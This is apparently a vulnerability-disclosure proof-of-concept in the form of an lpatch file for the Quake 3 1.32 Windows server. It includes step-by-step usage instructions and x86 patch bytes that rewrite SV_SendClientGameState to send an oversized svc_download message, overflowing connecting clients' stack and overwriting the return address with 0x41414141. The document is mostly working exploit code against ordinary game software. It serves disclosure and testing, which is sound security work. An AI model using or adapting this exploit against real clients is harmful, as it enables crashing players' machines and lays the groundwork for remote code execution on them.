====================================================================================
#
# this file has been created for the Lame patcher program available for both *nix
# and Windows platforms.
# You need this program for continuing the patching of your files:
#
#   http://aluigi.org/mytoolz.htm#lpatch
#
# Quick step-by-step
# - launch lpatch.exe
# - select this q3cbof.lpatch file
# - read the message windows and click yes
# - select the quake3.exe file to patch
# - read the message windows to know if everything has been patched correctly
# - test your client using this malicious server executable

TITLE
    q3cbof proof-of-concept for Quake 3 1.32 Windows executable 0.1
    by Luigi Auriemma
    e-mail: aluigi@autistici.org
    web:    aluigi.org

INTRO
    Advisory:
    .
    . http://aluigi.org/adv/q3cbof-adv.txt
    .
    This patch transforms a Windows Quake 3 1.32 executable in a proof-of-concept
    for testing the above bug: any client which will try to connect to this server
    will crash with the return address overwritten by 0x41414141.

FILE
    quake3.exe

RVA
    00400000

BYTES_ORIGINAL              ; void SV_SendClientGameState( client_t *client )
    8D 44 24 38             ; // send the gamestate
    6A 02 50 E8 2B 4D FF FF
    8B 8E 04 04 01 00 51 8D
    54 24 44 52 E8 9A 4D FF
    FF 83 C4 3C 33 ED BF 04
    76 97 00 8B 07 80 38 00
    74 27 8D 4C 24 0C 6A 03
    51 E8 FD 4C FF FF 8D 54 ; ...

BYTES_PATCH
    6a 06                   ; push svc_download
    8D 44 24 3c         50  ; push &msg
    e8 ^004295F0            ; call MSG_WriteByte

    6a ff                   ; push -1
    8D 44 24 44         50  ; push &msg
    e8 ^00429650            ; call MSG_WriteShort

    68 |00004020            ; push 16384 + 32
    8D 44 24 4c         50  ; push &msg
    e8 ^00429650            ; call MSG_WriteShort

    33 db                   ; for(i = 0;
        6a 00               ; push 0x00
        8D 44 24 54     50  ; push &msg
        e8 ^004295F0        ; call MSG_WriteByte
        58                  ; pop eax
        58                  ; pop eax
    43                      ; i++
    81 fb |4000             ; i < 16384
    7c e9

    33 db                   ; for(i = 0;    // return address
        6a 41               ; push 'A'
        8D 44 24 54     50  ; push &msg
        e8 ^004295F0        ; call MSG_WriteByte
        58                  ; pop eax
        58                  ; pop eax
    43                      ; i++
    81 fb |20               ; i < 32
    7c e9

    56                      ; push client
    8D 44 24 54         50  ; push &msg
    e8 ^0043AFC0            ; call SV_SendMessageToClient

    83 c4 4c                ; free stack and return
    e9 ^004349B6

====================================================================================